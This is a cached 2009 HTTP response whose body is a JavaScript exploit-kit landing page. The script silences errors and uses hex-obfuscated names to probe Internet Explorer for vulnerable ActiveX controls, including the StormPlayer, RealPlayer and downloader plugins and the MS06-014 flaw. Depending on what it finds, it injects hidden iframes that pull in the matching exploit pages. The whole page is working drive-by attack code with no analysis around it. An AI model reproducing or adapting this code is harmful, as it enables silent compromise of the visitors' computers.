HTTP/1.1 200 OK
Content-Length: 2134
ETag: "0289667e97c91:60b"
Date: Wed, 25 Feb 2009 10:19:53 GMT
Last-Modified: Wed, 25 Feb 2009 06:00:48 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.sll2468.cn/a168/fxx.htm
X-Polipo-Date: Wed, 25 Feb 2009 10:30:39 GMT
X-Polipo-Access: Thu, 05 Mar 2009 07:12:01 GMT

<Script>
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");
document.write("");var ssdfs="d";
document.write("<Iframe width=100 height=0 src=../a1/ss.htm></iframe>");
window.status="Íê³É";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<Iframe width=100 height=0 src=../a1/MS06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("\x44"+"\x6f\x77\x6e\x6c\x6f\x61\x64\x65\x72\x2e\x44\x4c\x6f\x61\x64\x65\x72\x2e\x31");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxac";var qxaaxx="aaaac";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};                      
finally{if(n!="[object Error]"){document.write("Downloader.DLoader.1");var cqqqqd="s";
document.write("<Iframe width=100 height=0 src=../a1/no.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("MPS.StormPlayer");}
catch(b){};                      
finally{if(b!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/bfyy.htm></iframe>");}}var sdddd="x";var sddqd="x";
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                      
finally{var dxl="x";if(f!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/GLWORLD.html></iframe>");}}var pqxl="d";
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
var llooiiuuyy="f";
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32"){var ammc="dsvb";
document.write('<Iframe style=display:none src="../a1/real.htm"></iframe>');}
else
document.write('<iframe style=display:none src="../a1/real.hTml"></iframe>');
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";abc="dfdae";document.write("");var fkav="BS";var fkasaccv="BS";var fkaqfccv="BS";var fkfdccv="BS";var bcalv="BS";
</script>